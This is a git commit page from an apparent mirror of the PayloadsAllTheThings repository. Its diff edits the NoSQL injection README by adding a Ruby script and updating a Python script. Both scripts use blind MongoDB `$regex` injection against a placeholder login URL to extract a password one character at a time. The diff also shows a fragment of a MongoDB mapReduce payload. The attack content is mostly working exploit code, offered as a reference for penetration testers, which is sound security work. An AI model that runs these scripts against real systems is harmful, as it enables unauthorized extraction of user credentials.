ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 10:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #545 from noraj/patch-1

Browse Source 
Blind NoSQL scripts
This commit is contained in:
Swissky 2022-09-23 00:38:05 +02:00 committed by GitHub
commit 7a528ccb3f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

39
NoSQL Injection/README.md
View File

@ -11,6 +11,7 @@
* [Extract data information](#extract-data-information)
* [Blind NoSQL](#blind-nosql)
* [POST with JSON body](#post-with-json-body)
* [POST with urlencoded body](#post-with-urlencoded-body)
* [GET](#get)
* [MongoDB Payloads](#mongodb-payloads)
* [References](#references)
@ -84,6 +85,7 @@ Extract data with "in"
### POST with JSON body
python script:
```python
import requests
@ -109,6 +111,8 @@ while True:
### POST with urlencoded body
python script:
```python
import requests
import urllib3
@ -133,6 +137,8 @@ while True:
### GET
python script:
```python
import requests
import urllib3
@ -147,13 +153,40 @@ u='http://example.org/login'
while True:
for c in string.printable:
if c not in ['*','+','.','?','|', '#', '&', '$']:
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
payload=f"?username={username}&password[$regex]=^{password + c}"
r = requests.get(u + payload)
if 'Yeah' in r.text:
print("Found one more char : %s" % (password+c))
print(f"Found one more char : {password+c}")
password += c
```
ruby script:
```ruby
require 'httpx'
username = 'admin'
password = ''
url = 'http://example.org/login'
# CHARSET = (?!..?~).to_a # all ASCII printable characters
CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-'
GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$']
session = HTTPX.plugin(:persistent)
while true
CHARSET.each do |c|
unless GET_EXCLUDE.include?(c)
payload = "?username=#{username}&password[$regex]=^#{password + c}"
res = session.get(url + payload)
if res.body.to_s.match?('Yeah')
puts "Found one more char : #{password + c}"
password += c
end
end
end
end
```
## MongoDB Payloads
```bash
@ -185,4 +218,4 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
* [Testing for NoSQL injection - OWASP/WSTG](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)
* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)